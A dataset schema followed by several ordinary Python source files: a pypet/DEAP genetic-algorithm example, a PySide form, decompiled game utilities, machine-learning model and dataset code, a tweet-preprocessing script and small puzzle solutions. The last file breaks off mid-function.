Dataset schema (one record per source file):

| column | dtype | range / classes |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–288 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M (nullable) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 (nullable) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 (nullable) |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128 – 8.19k |
| authors | list | length 1–1 |
| author_id | string | length 1–132 |
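As a minimal sketch of how one record of this schema could be read, assuming the data ships as Parquet shards loadable with the Hugging Face `datasets` library (the `data_files` glob below is a placeholder, not the dataset's actual layout):

```python
from datasets import load_dataset

# Placeholder glob: point this at the dataset's actual Parquet shards.
ds = load_dataset("parquet", data_files="data/*.parquet",
                  split="train", streaming=True)

for record in ds.take(1):
    # Provenance metadata sits alongside the file content itself.
    print(record["repo_name"], record["path"], record["license_type"])
    print(record["content"][:200])  # first 200 characters of the source file
```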
blob_id: c53ec5397ec182007a22d88243b2d4ec32a3f966 | directory_id: d6ca0b326f1bd0ce381c6db611f6331096bf4187
path: /examples/example_20_using_deap_manual_runs.py | content_id: ab46bba8dfec0020018669d017e35953cbda71ea
detected_licenses: ["BSD-3-Clause"] | license_type: permissive | repo_name: SmokinCaterpillar/pypet
snapshot_id: aa35355d70e8f44be015313494376d993f645d80 | revision_id: 3d454ac65f89e7833baaf89510f73c546e90d8f6 | branch_name: refs/heads/develop
visit_date: 2023-08-08T16:01:54.087819 | revision_date: 2023-02-14T14:59:32 | committer_date: 2023-02-14T14:59:32
github_id: 12,901,526 | star_events_count: 89 | fork_events_count: 22
gha_license_id: BSD-3-Clause | gha_event_created_at: 2023-07-24T00:46:12 | gha_created_at: 2013-09-17T17:06:00 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 6,723 | extension: py
content:
""" An example showing how to use DEAP optimization (http://pythonhosted.org/deap/).
DEAP can be combined with *pypet* to keep track of all the data and the full trajectory
of points created by a genetic algorithm.
Note that *pypet* adds quite some overhead to the optimization algorithm.
Using *pypet* in combination with DEAP is only suitable in case the
evaluation of an individual (i.e. a single run) takes a considerable amount of time
(i.e. 1 second or longer) and, thus, pypet's overhead is only marginal.
This *OneMax* problem serves only as an example and is not a well suited problem.
Suitable would be the genetic optimization of neural networks where running and evaluating
the network may take a few seconds.
Here we avoid using an Environment and *manually* execute runs using multiprocessing.
"""
__author__ = 'Robert Meyer'
import random
import os
import multiprocessing as multip
try:
from itertools import izip
except ImportError:
# For Python 3
izip = zip
from deap import base
from deap import creator
from deap import tools
from pypet import Trajectory, cartesian_product, manual_run, MultiprocContext
@manual_run(store_meta_data=True) # Important decorator for manual execution of runs
def eval_one_max(traj, individual):
"""The fitness function"""
traj.f_add_result('$set.$.individual', list(individual))
fitness = sum(individual)
traj.f_add_result('$set.$.fitness', fitness)
traj.f_store()
return (fitness,) # DEAP wants a tuple here!
def eval_wrapper(the_tuple):
"""Wrapper function that unpacks a single tuple as arguments to the fitness function.
The pool's map function only allows a single iterable so we need to zip it first
and then unpack it here.
"""
return eval_one_max(*the_tuple)
def main():
# No environment here ;-)
filename = os.path.join('experiments', 'example_20.hdf5')
traj = Trajectory('onemax', filename=filename, overwrite_file=True)
# ------- Add parameters ------- #
traj.f_add_parameter('popsize', 100)
traj.f_add_parameter('CXPB', 0.5)
traj.f_add_parameter('MUTPB', 0.2)
traj.f_add_parameter('NGEN', 20)
traj.f_add_parameter('generation', 0)
traj.f_add_parameter('ind_idx', 0)
traj.f_add_parameter('ind_len', 50)
traj.f_add_parameter('indpb', 0.005)
traj.f_add_parameter('tournsize', 3)
traj.f_add_parameter('seed', 42)
traj.f_store(only_init=True)
# ------- Create and register functions with DEAP ------- #
creator.create("FitnessMax", base.Fitness, weights=(1.0,))
creator.create("Individual", list, fitness=creator.FitnessMax)
toolbox = base.Toolbox()
# Attribute generator
toolbox.register("attr_bool", random.randint, 0, 1)
# Structure initializers
toolbox.register("individual", tools.initRepeat, creator.Individual,
toolbox.attr_bool, traj.ind_len)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
# Operator registering
toolbox.register("mate", tools.cxTwoPoint)
toolbox.register("mutate", tools.mutFlipBit, indpb=traj.indpb)
toolbox.register("select", tools.selTournament, tournsize=traj.tournsize)
toolbox.register("evaluate", eval_wrapper)
pool = multip.Pool(4)
toolbox.register("map", pool.map) # We use the pool's map function!
# ------- Initialize Population -------- #
random.seed(traj.seed)
pop = toolbox.population(n=traj.popsize)
CXPB, MUTPB, NGEN = traj.CXPB, traj.MUTPB, traj.NGEN
start_idx = 0 # We need to count executed runs
print("Start of evolution")
for g in range(traj.NGEN):
print("-- Generation %i --" % g)
# Determine individuals that need to be evaluated
eval_pop = [ind for ind in pop if not ind.fitness.valid]
# Add as many explored runs as individuals that need to be evaluated
traj.f_expand(cartesian_product({'generation': [g], 'ind_idx': range(len(eval_pop))}))
# We need to make the storage service multiprocessing safe
mc = MultiprocContext(traj, wrap_mode='QUEUE')
mc.f_start()
# Create a single iterable to be passed to our fitness function (wrapper).
# `yields='copy'` is important, the pool's `map` function will
# go over the whole iterator at once and store it in memory.
# So for every run we need a copy of the trajectory.
# Alternatively, you could use `yields='self'` and use the pool's `imap` function.
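        # A hypothetical sketch of that `imap` alternative (not in the original
        # example): with `yields='self'` the same trajectory object is yielded
        # each time, so the iterable must be consumed lazily:
        #   zip_iterable = izip(traj.f_iter_runs(start_idx, yields='self'), eval_pop)
        #   fitnesses = list(pool.imap(eval_wrapper, zip_iterable))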
zip_iterable = izip(traj.f_iter_runs(start_idx, yields='copy'), eval_pop)
fitnesses = toolbox.map(eval_wrapper, zip_iterable)
# fitnesses is just a list of tuples [(fitness,), ...]
for idx, fitness in enumerate(fitnesses):
# Update fitnesses
eval_pop[idx].fitness.values = fitness
# Finalize the multiproc wrapper
mc.f_finalize()
# Update start index
start_idx += len(eval_pop)
print(" Evaluated %i individuals" % len(eval_pop))
# Gather all the fitnesses in one list and print the stats
fits = [ind.fitness.values[0] for ind in pop]
length = len(pop)
mean = sum(fits) / length
sum2 = sum(x*x for x in fits)
std = abs(sum2 / length - mean**2)**0.5
print(" Min %s" % min(fits))
print(" Max %s" % max(fits))
print(" Avg %s" % mean)
print(" Std %s" % std)
# ------- Create the next generation by crossover and mutation -------- #
if g < traj.NGEN -1: # not necessary for the last generation
# Select the next generation individuals
offspring = toolbox.select(pop, len(pop))
# Clone the selected individuals
offspring = list(map(toolbox.clone, offspring))
# Apply crossover and mutation on the offspring
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < CXPB:
toolbox.mate(child1, child2)
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
if random.random() < MUTPB:
toolbox.mutate(mutant)
del mutant.fitness.values
# The population is entirely replaced by the offspring
pop[:] = offspring
# Stop the multiprocessing pool
pool.close()
pool.join()
print("-- End of (successful) evolution --")
best_ind = tools.selBest(pop, 1)[0]
print("Best individual is %s, %s" % (best_ind, best_ind.fitness.values))
traj.f_store() # And store all the rest of the data
if __name__ == "__main__":
main()
authors: ["[email protected]"]
blob_id: a607cfd0c82f0951367c489f47dad4d25eb49d58 | directory_id: 00829e1ff78f73dab073a201d68139960c1d1922
path: /tools/toolset/tool/rigging/pipline_tool/ui/his/ui_create_character.py | content_id: 42c99cc1874dedb0e213f77abca01d3414e1a31e
detected_licenses: [] | license_type: no_license | repo_name: liangyongg/Beam_Tools
snapshot_id: a021ceb4187107508536c46726da5b9629ffd1cf | revision_id: 21b5d06e660f058434e589ae4f672f96296b7540 | branch_name: refs/heads/master
visit_date: 2018-11-04T04:43:02.523654 | revision_date: 2018-08-26T12:33:09 | committer_date: 2018-08-26T12:33:09
github_id: 115,005,481 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,908 | extension: py
content:
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_create_character.ui'
#
# Created: Thu Apr 26 11:29:46 2018
# by: pyside-uic 0.2.15 running on PySide 1.2.4
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(430, 262)
self.verticalLayout = QtGui.QVBoxLayout(Form)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setContentsMargins(-1, -1, 50, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtGui.QLabel(Form)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.lineEdit = QtGui.QLineEdit(Form)
self.lineEdit.setObjectName("lineEdit")
self.horizontalLayout.addWidget(self.lineEdit)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setContentsMargins(50, -1, 50, -1)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.pushButton = QtGui.QPushButton(Form)
self.pushButton.setObjectName("pushButton")
self.verticalLayout_2.addWidget(self.pushButton)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "name:", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton.setText(QtGui.QApplication.translate("Form", "create", None, QtGui.QApplication.UnicodeUTF8))
authors: ["hhhh"] | author_id: hhhh
blob_id: ce74a238c917af6de5cfc93964163002750f06d8 | directory_id: 59de7788673ade984b9c9fbc33664a7cbdba67d3
path: /res/scripts/client_common/shared_utils/__init__.py | content_id: 9b417b171ce7cf3e50a53c5b6006973b705af2f6
detected_licenses: [] | license_type: no_license | repo_name: webiumsk/WOT-0.9.15-CT
snapshot_id: 3fa24ab37a6c91b7073034afb2f355efa5b7fe36 | revision_id: fbd194fbaa6bdece51c7a68fc35bbb5257948341 | branch_name: refs/heads/master
visit_date: 2020-12-24T21:27:23.175774 | revision_date: 2016-05-01T13:47:44 | committer_date: 2016-05-01T13:47:44
github_id: 57,600,180 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: WINDOWS-1250 | language: Python | is_vendor: false | is_generated: false | length_bytes: 4,366 | extension: py
content:
# 2016.05.01 15:25:53 Central Europe (daylight saving time)
# Embedded file name: scripts/client_common/shared_utils/__init__.py
import weakref
import itertools
import types
import BigWorld
from debug_utils import LOG_ERROR, LOG_WARNING
ScalarTypes = (types.IntType,
types.LongType,
types.FloatType,
types.BooleanType) + types.StringTypes
IntegralTypes = (types.IntType, types.LongType)
def makeTupleByDict(ntClass, data):
unsupportedFields = set(data) - set(ntClass._fields)
supported = {}
for k, v in data.iteritems():
if k not in unsupportedFields:
supported[k] = v
return ntClass(**supported)
class BoundMethodWeakref(object):
def __init__(self, func):
self.methodName = func.__name__
        # The decompiler rendered the original assert as a bogus `raise ... or ...`;
        # restored to the assert it stood for.
        assert not self.methodName.startswith('__'), 'BoundMethodWeakref: private methods are not supported'
self.wrefCls = weakref.ref(func.__self__)
def __call__(self, *args, **kwargs):
return getattr(self.wrefCls(), self.methodName)(*args, **kwargs)
def forEach(function, sequence):
for e in sequence:
function(e)
def isEmpty(sequence):
try:
next(sequence)
except StopIteration:
return True
return False
def safeCancelCallback(callbackID):
try:
BigWorld.cancelCallback(callbackID)
except ValueError:
LOG_ERROR('Cannot cancel BigWorld callback: incorrect callback ID.')
def prettyPrint(dict, sort_keys = True, indent = 4):
import json
return json.dumps(dict, sort_keys=sort_keys, indent=indent)
def findFirst(function_or_None, sequence, default = None):
try:
return next(itertools.ifilter(function_or_None, sequence))
except StopIteration:
return default
def first(sequence, default = None):
return findFirst(None, sequence, default)
class CONST_CONTAINER(object):
__keyByValue = None
@classmethod
def getIterator(cls):
for k, v in cls.__dict__.iteritems():
if not k.startswith('_') and type(v) in ScalarTypes:
yield (k, v)
@classmethod
def getKeyByValue(cls, value):
cls.__doInit()
return cls.__keyByValue.get(value)
@classmethod
def hasKey(cls, key):
return key in cls.__dict__
@classmethod
def hasValue(cls, value):
cls.__doInit()
return value in cls.__keyByValue
@classmethod
def ALL(cls):
return tuple([ v for k, v in cls.getIterator() ])
@classmethod
def __doInit(cls):
if cls.__keyByValue is None:
cls.__keyByValue = dict(((v, k) for k, v in cls.getIterator()))
return
class BitmaskHelper(object):
@classmethod
def add(cls, mask, flag):
if not mask & flag:
mask |= flag
return mask
return -1
@classmethod
def addIfNot(cls, mask, flag):
if not mask & flag:
mask |= flag
return mask
@classmethod
def remove(cls, mask, flag):
if mask & flag > 0:
mask ^= flag
return mask
return -1
@classmethod
def removeIfHas(cls, mask, flag):
if mask & flag > 0:
mask ^= flag
return mask
class AlwaysValidObject(object):
def __init__(self, name = ''):
self.__name = name
def __getattr__(self, item):
if item in self.__dict__:
return self.__dict__[item]
return AlwaysValidObject(self._makeName(self.__name, item))
def __call__(self, *args, **kwargs):
return AlwaysValidObject()
def getName(self):
return self.__name
@classmethod
def _makeName(cls, parentName, nodeName):
return '%s/%s' % (parentName, nodeName)
def isDefaultDict(sourceDict, defaultDict):
for k, v in defaultDict.iteritems():
if k not in sourceDict:
return False
if sourceDict[k] != v:
return False
return True
def nextTick(func):
"""
Moves function calling to the next frame
"""
def wrapper(*args, **kwargs):
BigWorld.callback(0.01, lambda : func(*args, **kwargs))
return wrapper
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client_common\shared_utils\__init__.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:25:53 Central Europe (daylight saving time)
authors: ["[email protected]"]
blob_id: 01bc8dd81cafcbbf52dd9b8525c0fd40f828b6f4 | directory_id: 274521d5ccfbaebb97cdfbfa340d951eee7c9efa
path: /Python/PythonProgrammingLanguage/Encapsulation/encap_env/bin/jsonschema | content_id: 116515a0218c94456db568d63ab738fffe5c5f5e
detected_licenses: ["MIT"] | license_type: permissive | repo_name: nitin-cherian/LifeLongLearning
snapshot_id: ef8e1ed61e4bf8b6ae4a0ae642c559ab47be84b4 | revision_id: 84084792058358365162c645742c70064a2d5fd6 | branch_name: refs/heads/master
visit_date: 2021-01-21T10:38:41.797326 | revision_date: 2018-08-23T01:28:10 | committer_date: 2018-08-23T01:28:10
github_id: 91,701,351 | star_events_count: 6 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 323
content:
#!/home/nitin/Learn/Repositories/Github/LifeLongLearning/Python/PythonProgrammingLanguage/Encapsulation/encap_env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from jsonschema.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
authors: ["[email protected]"]
blob_id: 76ba202c34534ea332d0d9c2b7c22175514cb943 | directory_id: bf331831c2c532d76b91c11127cc4c76cf9f0031
path: /166/D/ans_errorneous.py | content_id: eac398768204dd7b212a8fb9e6f37ee62331d50c
detected_licenses: [] | license_type: no_license | repo_name: mugenen/Codeforces-Solution
snapshot_id: 519899d658a52dc87bfdba81110e9851ccf3b6de | revision_id: f69874ad46acc511f4485dc29249f7010f562ea9 | branch_name: refs/heads/master
visit_date: 2021-01-22T04:49:48.986989 | revision_date: 2013-02-25T12:36:10 | committer_date: 2013-02-25T12:36:10
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,288 | extension: py
content:
import sys
import collections
import bisect
import math
class Trie:
class Node:
def __init__(self, x, bros = None, child = None):
self.data = x
self.bros = bros
self.child = child
def get_child(self, x):
child = self.child
while child:
if child.data == x: break
child = child.bros
return child
def set_child(self, x):
child = Trie.Node(x, self.child)
self.child = child
return child
def traverse(self, leaf, filter, count, k):
# print self.data
if self.data == '$':
yield []
else:
child = self.child
while child:
temp = count
if self.data in filter:
temp += 1
if temp > k:
child = child.bros
continue
for x in child.traverse(leaf, filter, temp, k):
yield [self.data] + x
child = child.bros
def __init__(self, x = None):
self.root = Trie.Node(None)
self.leaf = x
def insert(self, seq):
node = self.root
for x in seq:
child = node.get_child(x)
if not child:
child = node.set_child(x)
node = child
if not node.get_child(self.leaf):
node.set_child(self.leaf)
def traverse(self, filter, k):
node = self.root.child
while node:
for x in node.traverse(self.leaf, filter, 0, k):
yield x
node = node.bros
string = raw_input()
filter_txt = raw_input()
k = int(raw_input())
filter = set()
A = ord('a')
for i in xrange(len(filter_txt)):
if filter_txt[i] == '0':
filter.add(chr(A + i))
trie = Trie()
for i in xrange(len(string)):
for j in xrange(i + 1, len(string) + 1):
trie.insert(string[i:j] + '$')
# print string[i:j] + '$', i, j
result = 0
check = set()
for s in trie.traverse(filter, k):
if s != []:
# print s
check.add(''.join(s))
# result += 1
#print result
print len(check)
authors: ["[email protected]"]
blob_id: 627649476ff37a030466b373ef750b7e153b0eb0 | directory_id: 498fcf34fa4482be5c9fefc488666e60edcf46c7
path: /supervised_learning/0x01-classification/17-deep_neural_network.py~ | content_id: 90473c634dabec13840cc70707d19fee907312fb
detected_licenses: [] | license_type: no_license | repo_name: MansourKef/holbertonschool-machine_learning
snapshot_id: 7dbc465def04c311c1afb0e8b8903cbe34c72ad3 | revision_id: 19f78fc09f0ebeb9f27f3f76b98e7a0e9212fd22 | branch_name: refs/heads/main
visit_date: 2023-03-12T16:18:08.919099 | revision_date: 2021-03-05T09:42:09 | committer_date: 2021-03-05T09:42:09
github_id: 317,303,125 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,201
content:
#!/usr/bin/env python3
"""module"""
import numpy as np
class DeepNeuralNetwork:
"""Deep Neural Network"""
def __init__(self, nx, layers):
"""Constructor"""
if not type(nx) is int:
raise TypeError("nx must be an integer")
if nx < 1:
raise ValueError("nx must be a positive integer")
if not type(layers) is list or len(layers) == 0:
raise TypeError("layers must be a list of positive integers")
self.L = len(layers)
self.cache = {}
self.weights = {}
for i in range(len(layers)):
if layers[i] <= 0 or not type(layers[i]) is int:
raise TypeError("layers must be a list of positive integers")
if i == 0:
self.weights['W{}'.format(i+1)] = \
np.random.randn(layers[i], nx) * np.sqrt(2/(nx))
self.weights['b{}'.format(i+1)] = np.zeros([layers[i], 1])
else:
self.weights['W{}'.format(i+1)] = \
np.random.randn(layers[i], layers[i-1]) * \
np.sqrt(2/(layers[i-1]))
self.weights['b{}'.format(i+1)] = np.zeros([layers[i], 1])
authors: ["[email protected]"]
blob_id: 0c98c3fa06970c85f3b2a81e02355551274fcf41 | directory_id: 5b22437902bffa0f62b375d56bfb2b4485ef43f0
path: /src/video_inpainting/padded_masked_video_tar_dataset.py | content_id: 93491de023c768894243ad89932a5aa1d0875600
detected_licenses: ["MIT", "CC-BY-SA-3.0", "CC-BY-SA-4.0"] | license_type: permissive | repo_name: JohnsonzxChang/devil
snapshot_id: eafa09f5258b4f33eda9564077814c6e63473a0f | revision_id: 296115cd5f4952c7dc65bbcaaf2d1d5c55ef5d35 | branch_name: refs/heads/public
visit_date: 2023-07-03T12:07:58.917440 | revision_date: 2021-08-10T00:06:38 | committer_date: 2021-08-10T00:06:38
github_id: 555,846,483 | star_events_count: 1 | fork_events_count: 0
gha_license_id: MIT | gha_event_created_at: 2022-10-22T13:22:43 | gha_created_at: 2022-10-22T13:22:42 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,437 | extension: py
content:
import tarfile
from itertools import cycle
from .padded_masked_video_dataset import PaddedMaskedVideoDataset
class PaddedMaskedVideoTarDataset(PaddedMaskedVideoDataset):
def __init__(self, frames_dataset_path, masks_dataset_path):
self._frames_dataset_tar = tarfile.open(frames_dataset_path, 'r')
self._masks_dataset_tar = tarfile.open(masks_dataset_path, 'r')
frame_video_names = sorted([info.name for info in self._frames_dataset_tar.getmembers() if info.isdir()])
mask_video_names = sorted([info.name for info in self._masks_dataset_tar.getmembers() if info.isdir()])
super().__init__(frame_video_names, mask_video_names)
def video_frame_files_iter(self, frame_video_name):
frame_paths = sorted([info.name for info in self._frames_dataset_tar.getmembers()
if info.name.startswith(frame_video_name) and info.isfile()])
for frame_path in frame_paths:
yield self._frames_dataset_tar.extractfile(frame_path)
def video_mask_files_iter(self, mask_video_name):
mask_paths = sorted([info.name for info in self._masks_dataset_tar.getmembers()
if info.name.startswith(mask_video_name) and info.isfile()])
mask_paths_c = cycle(mask_paths + mask_paths[len(mask_paths)-2:0:-1])
for mask_path in mask_paths_c:
yield self._masks_dataset_tar.extractfile(mask_path)
authors: ["[email protected]"]
blob_id: dbe01cfd78374273c1c4be47f16e8c86a9962fcb | directory_id: 13d222bc3332378d433835914da26ed16b583c8b
path: /src/pemjh/challenge52/main.py | content_id: b1407abc5c0d32694b4aaf0241a641dcaad75fcd
detected_licenses: [] | license_type: no_license | repo_name: mattjhussey/pemjh
snapshot_id: c27a09bab09cd2ade31dc23fffac07374bea9366 | revision_id: 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | branch_name: refs/heads/master
visit_date: 2023-04-16T03:08:59.390698 | revision_date: 2023-04-08T10:54:00 | committer_date: 2023-04-08T10:54:00
github_id: 204,912,926 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 681 | extension: py
content:
""" Challenge052 """
def get_sorted_string(unsorted):
"""
>>> get_sorted_string(54326)
'23456'
>>> get_sorted_string("aBayU")
'BUaay'
"""
return "".join(sorted(str(unsorted)))
def main():
""" challenge052 """
root = 0
found = False
while not found:
root += 1
root_sorted = get_sorted_string(root)
found = True
for i in range(2, 7):
# Try i * root
multiple = root * i
multiple_sorted = get_sorted_string(multiple)
if root_sorted != multiple_sorted:
found = False
break
return root
authors: ["[email protected]"]
blob_id: fcf6d5b203f22c6e42690390171431383fde3627 | directory_id: 9b328903c7ce1ddfc957c6db4a5fef265bce1dad
path: /preprocess.py | content_id: 2d04c659dfe88bfdce2082cc1a99285c36834611
detected_licenses: [] | license_type: no_license | repo_name: matatabinoneko/viral_tweet_generation
snapshot_id: 4a610b0327d7ce0e8e2b94eec0f82aa9f1c35ca1 | revision_id: 1e26de293420dbed6f50f161b3210c9d14e3b2d4 | branch_name: refs/heads/main
visit_date: 2023-03-12T16:11:14.187622 | revision_date: 2021-03-02T00:11:47 | committer_date: 2021-03-02T00:11:47
github_id: 330,305,509 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 4,466 | extension: py
content:
'''
Preprocess tweets.
'''
import argparse
import logzero
from logzero import logger
import logging
from os import path
from typing import List
from filtering_type import EmoticonFilter
import json
import MeCab
from collections import defaultdict
import re
logger.setLevel(logging.INFO)
mecabTagger = MeCab.Tagger("-Ochasen")
hiragana = re.compile('[ぁ-ゟ]+')
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-i', '--input', type=path.abspath, help='input file path')
parser.add_argument(
'-o', '--output', type=path.abspath, help='output file path')
parser.add_argument(
"--tokenizer", type=str, default="char", help="tokenizer. Select mecab if you want to use mecab"
)
args = parser.parse_args()
return args
def full_width2half_width(text: str) -> str:
'''
    Convert full-width characters to their half-width equivalents.
    '''
    # Map full-width ASCII (starting at U+FF01) onto half-width ASCII (starting at U+0021)
text = text.translate(str.maketrans(
{chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))
return text
def test_full_width2half_width():
text = "!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`>?@abcdefghijklmnopqrstuvwxyz{|}~"
trans_text = full_width2half_width(text)
answer = '!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`>?@abcdefghijklmnopqrstuvwxyz{|}~'
assert trans_text == answer, f"{trans_text}\n{answer}"
def is_char_length(text: str, max_length=140) -> bool:
'''
    Return False for tweets longer than max_length.
    '''
    return len(text) <= max_length
def test_is_char_length():
text_list = ["", ''.join(['a' for _ in range(139)]), ''.join(
['a' for _ in range(140)]), ''.join(['a' for _ in range(141)])]
answer_list = [True, True, True, False]
for text, answer in zip(text_list, answer_list):
assert is_char_length(text) == answer
def get_keywords(text: str) -> List[str]:
"""
    Extract keywords from a tweet.
    Parameters
    ----------
    text : str
        The tweet text.
    Returns
    -------
    keywords : List[str]
        The list of extracted keywords.
"""
keywords = []
node = mecabTagger.parseToNode(text)
while node:
word = node.surface
hinshi = node.feature.split(",")
if hinshi[0] == "名詞" and hinshi[1] != "代名詞" and not hiragana.fullmatch(word):
keywords.append(word)
node = node.next
keywords = list(set(keywords))
return keywords
def test_get_keywords():
queries = ["私のご飯", 'あれとこれ', 'ももとすもも']
answers = [["ご飯"], [], []]
for q, a in zip(queries, answers):
q = get_keywords(q)
assert set(q) == set(a), f"{q},{a}"
def main():
args = parse_args()
logger.info(args)
    # The original referenced `self.mecab`, which does not exist in this scope;
    # the module-level `mecabTagger` is the tokenizer actually available.
    def tokenizer(text):
        return mecabTagger.parse(text).split() if args.tokenizer == 'mecab' else ' '.join(list(text))
filter = EmoticonFilter()
cnt_dic = defaultdict(int)
with open(args.input, 'r') as fin, open(args.output, 'w') as fout:
for line in fin:
try:
line = json.loads(line)
text = line["text"]
                # Skip tweets that contain emoticons
if filter._has_emoticon(text):
cnt_dic['emoji'] += 1
continue
if not is_char_length(text):
logger.debug(f"this tweet is exceed 140 chars. \n{text}")
cnt_dic["more_than_140"] += 1
continue
                # Remove the user name
text = filter._username_filter(text)
                # Normalize spaces and similar characters
text = filter._normalization(text)
keywords = list(map(tokenizer, get_keywords(text)))
text = tokenizer(text)
print(json.dumps(
{"keywords": keywords, "tweet": text}, ensure_ascii=False), file=fout)
except:
cnt_dic['error'] += 1
logger.error(f"this data is skipped {line}")
logger.info(
f"emoji tweet: {cnt_dic['emoji']}\nmore than 140 tweet:{cnt_dic['more_than_140']}\nerror:{cnt_dic['error']}")
if __name__ == '__main__':
main()
authors: ["[email protected]"]
blob_id: caa4886993b2a6034b738129474f78353d70e2af | directory_id: c427d9142df033af2b509412153dae35706ede61
path: /recognition/pytorch_crnn/models/layers.py | content_id: fbaa09d9385382391ff58e1b8a380ebc4e74d249
detected_licenses: [] | license_type: no_license | repo_name: brahimbellahcen/ocr_toolkit
snapshot_id: 0b68776fe20b05f48807f856fffac752e3e08e66 | revision_id: b4516d4193132eb48f821926dd6ef5d368f53899 | branch_name: refs/heads/master
visit_date: 2022-11-13T10:21:14.083497 | revision_date: 2020-06-26T15:31:38 | committer_date: 2020-06-26T15:31:38
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,032 | extension: py
content:
import torch
import torch.nn as nn
import torch.nn.functional as F
class blockCNN(nn.Module):
def __init__(self, in_nc, out_nc, kernel_size, padding, stride=1):
super(blockCNN, self).__init__()
self.in_nc = in_nc
self.out_nc = out_nc
self.kernel_size = kernel_size
self.padding = padding
# layers
self.conv = nn.Conv2d(in_nc, out_nc,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn = nn.BatchNorm2d(out_nc)
def forward(self, batch, use_bn=False, use_relu=False,
use_maxpool=False, maxpool_kernelsize=None):
"""
in:
batch - [batch_size, in_nc, H, W]
out:
batch - [batch_size, out_nc, H', W']
"""
batch = self.conv(batch)
if use_bn:
batch = self.bn(batch)
if use_relu:
batch = F.relu(batch)
if use_maxpool:
assert maxpool_kernelsize is not None
batch = F.max_pool2d(batch, kernel_size=maxpool_kernelsize, stride=2)
return batch
class blockRNN(nn.Module):
def __init__(self, in_size, hidden_size, out_size, bidirectional, dropout=0):
super(blockRNN, self).__init__()
self.in_size = in_size
self.hidden_size = hidden_size
self.out_size = out_size
self.bidirectional = bidirectional
# layers
self.gru = nn.GRU(in_size, hidden_size, bidirectional=bidirectional)
def forward(self, batch, add_output=False):
"""
in array:
batch - [seq_len , batch_size, in_size]
out array:
out - [seq_len , batch_size, out_size]
"""
# batch_size = batch.size(1)
